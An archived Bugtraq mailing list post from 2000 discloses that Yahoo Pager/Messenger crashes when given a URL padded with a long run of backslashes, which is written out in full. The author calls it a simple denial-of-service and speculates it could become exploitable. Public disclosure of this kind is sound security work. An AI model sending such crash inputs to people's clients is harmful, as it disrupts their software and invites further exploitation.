Bugtraq mailing list archives
Yahoo Pager/Messanger Buffer Overflow
From: jaynus () GOATRANCE COM (Jaynus Jaynus)
Date: Sun, 16 Jan 2000 22:55:44 -0800
('binary' encoding is not supported, stored as-is) While reading my bugtraq mail, I read over the ICQ overflow that had be found (suprised it came so late) so I was curious if this existed in any other clients. Upon testing the below URL, yahoo pager/messenger crashed in the same was as ICQ. http://www.asdf.com/?\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Just a quick little find, I am guessing that it should be easy to push the stack in an exploitable direction, but for the time being, it can be used as just a simple DoS attack. - J a y n u s /\___ \ \/__/\ \ __ __ __ ___ __ __ ____ _\ \ \ /'__`\ /\ \/\ \ /' _ `\/\ \/\ \ /',__\ /\ \_\ \/\ \L\.\_\ \ \_\ \/\ \/\ \ \ \_\ \/\__, `\ \ \____/\ \__/.\_\\/`____ \ \_\ \_\ \____/\/\____/ \/___/ \/__/\/_/ `/___/> \/_/\/_/\/___/ \/___/ /\___/ \/__/ ------------------------------------------------------------ get yourname () goatrance com from http://www.goatrance.com! electronic music, mail, trance and downloads at http://www.futuretrance.com
Current thread:
- MS IIS 5.0 Access Violation on handling URL String Lark Lizerman (Jan 13)
- Re: MS IIS 5.0 Access Violation on handling URL String Anthony Benjamin (Jan 14)
- Re: MS IIS 5.0 Access Violation on handling URL String Imran Ghory (Jan 18)
- Re: MS IIS 5.0 Access Violation on handling URL String David Litchfield (Jan 15)
- Re: MS IIS 5.0 Access Violation on handling URL String Lark Lizerman (Jan 15)
- Yahoo Pager/Messanger Buffer Overflow Jaynus Jaynus (Jan 16)
- <Possible follow-ups>
- Re: MS IIS 5.0 Access Violation on handling URL String Michael Howard (Jan 17)
- Re: MS IIS 5.0 Access Violation on handling URL String Michael Howard (Jan 18)
- Re: MS IIS 5.0 Access Violation on handling URL String Anthony Benjamin (Jan 14)